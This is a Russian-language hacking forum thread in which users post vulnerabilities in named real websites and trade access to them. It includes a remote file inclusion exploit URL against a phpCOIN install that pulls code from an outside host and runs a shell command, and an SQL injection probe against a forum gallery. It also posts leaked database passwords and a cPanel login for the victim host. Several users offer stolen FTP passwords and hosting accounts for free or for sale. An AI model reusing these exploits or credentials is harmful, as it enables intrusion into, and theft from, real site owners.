![]() |
Уязвимости на fantoo.ru
Странно, что человек администрирующий такой интересный и трудоёмкий проект, допускает такие глупейшие ошибки...
fantoo.ru/includes fantoo.ru/database Там есть ещё куча багов, но публиковать небуду. |
Да прямо шок.
|
просто права на папки и файлы не выставил)
|
Зато на какие файлы ))
|
ндя... бывает и такое)
|
Хах.. бывают же в жизни сопадения)
Ну-ка.. кто найден пореальней багу тот приз получит =))) считая что все же права на папочки расставлены грамотно и доступ к ним закрыт =) Ах да.. и определить что это за движок =) |
powered-by-drupal или я ошыбаюсь?
|
Цитата:
|
Inferno, верно.! :)
Как насчет баг?:) Выкладывай, тебе это только на пользу будет, т.е. это тебе будет в плюс =) .. так актуальней звучит :) |
Ребз, ну я нашёл анонимный вход на фтп))) кароч сервак не настроен совсем)
|
D1mOn, я говорю про сам движок, а не про этот конкретный случай :)
|
На http://www.freedom-uk.com багу нашёл
Это хостинг английский, бага в phpcoin Диагноз выполнение никсовых команд например http://www.freedom-uk.com/config.php?_CCFG[_PKG_PATH_DBSE]=http://qwe20063.narod.ru/&cmd=id |
полюбому + =)
А если по drupal?) |
вот ещё нашёл http://fantoo.ru/update.php
|
Код:
-rwxr-xr-x 1 freedom freedom 1659 Nov 27 19:38 .htaccess |
С этого момента поподробней :))) Или в ПМ =))
|
Снимайте видео!
|
да не это отсюда http://www.freedom-uk.com/config.php?_CCFG[_PKG_PATH_DBSE]=http://qwe20063.narod.ru/&cmd=id )
|
Ах вот оно что =)))
Ну хитрец) Я же просил найти багу в движке а не через сервак попасть туда =) |
я ищу)))
ЗЫ Ребз, с 777 сообщением тебя))) |
Цитата:
Цитата:
|
Попробуй провести атаку и реализовать багу :)
|
$_DBCFG['dbuname'] = "freedom_coin2";
$_DBCFG['dbpass'] = "8wns9NvEKDwS"; |
нда, хостер.. )
мы про движок) |
эт ты про хостера)
|
http://eol3d.com бага на форуме (и в галерее)
двиг- Invision Power Board Диагноз sql иньекция http://eol3d.com/forum/index.php?act=module&module=gallery&cmd=slideshow& show=' |
это и есть sql-inj
Ток вы уже не по теме стали писать..эх |
Цитата:
|
если кому нужны ftp пассы к сайтам, ставьте (+), я пасс в ПМ отправлю
сайты в домене com |
Цитата:
Ищите баги на сайтах сами :mad: |
Короче скорей всего вылажу логин и пасс к хостингу в раздел Халява
|
Нда, народ халяву любит...
Ладно, думаю тема исчерпала себя..) |
Хостинг на халяву!
www.freedom-uk.com/cpanel login: freedom pass: ikalinga1 Пользуйтесь, если можно поставьте плюсик |
А кто что продаёт?
|
У меня есть ещё куча хостингов, кто заинтересуется, стучите
|
| Время: 09:28 |